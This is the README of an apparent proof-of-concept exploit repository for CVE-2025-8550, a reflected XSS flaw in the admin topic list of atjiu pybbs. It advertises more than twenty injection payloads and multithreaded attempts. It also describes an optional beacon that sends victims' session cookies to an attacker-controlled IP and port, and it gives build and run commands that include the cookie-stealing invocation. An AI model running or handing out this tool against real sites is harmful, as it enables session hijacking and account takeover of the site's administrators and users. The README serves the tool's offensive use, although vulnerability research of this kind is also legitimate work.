# CVE-2025-8550 – atjiu pybbs XSS Exploit

## Description

This repository hosts an automated Proof-of-Concept (PoC) exploit for **CVE-2025-8550**, a reflected Cross‑Site Scripting (XSS) vulnerability in **atjiu pybbs** (≤ v6.0.0). It targets the `/admin/topic/list` endpoint’s `username` parameter, which lacks proper input sanitization.

## Features

* **20+ Payload Variations:** script, SVG, iframe, object, onerror handlers and more.
* **Automatic URL Encoding:** ensures safe injection via libcurl’s `curl_easy_escape`.
* **Cookie Exfiltration (Optional):** beacon injection to send `document.cookie` to an attacker‑controlled server.
* **Multithreading:** uses pthreads to parallelize attempts and speed up testing.
* **Customizable CLI:** powered by `argparse`, supports specifying:

  * Target URL (`-u` / `--url`)
  * Cookie file for authenticated requests (`-c` / `--cookies`)
  * Enable cookie payload (`-k` / `--cokpay`)
  * Attacker server IP/port (`-i` / `--ip`, `-p` / `--port`)
  * Verbose logging (`-v` / `--verbose`)


## Build & Usage

```
# Compile the exploit binary
gcc exploit.c argparse.c -o CVE-2025-8550 -lcurl -lpthread 

# Run against target
./CVE-2025-8550 -u http://<TARGET> -v [-c [COOKIE_FILE]]

#COOKIE SEND :
./CVE-2025-8550 -u http://TARGET -i <YOUR_IP> -p <YOUR_PORT> -v [VERBOSE_MODE] -k [PAYLOAD_COOKIE]
```

* Replace `http://<TARGET>` with your instance of atjiu pybbs.
* Use `-k` to enable the cookie‑stealing beacon (requires `-i` and `-p`).
* Omit `-c` if no authentication cookies are needed.

## References :
- NVD Entry : https://nvd.nist.gov/vuln/detail/CVE-2025-8550


## License :

MIT License



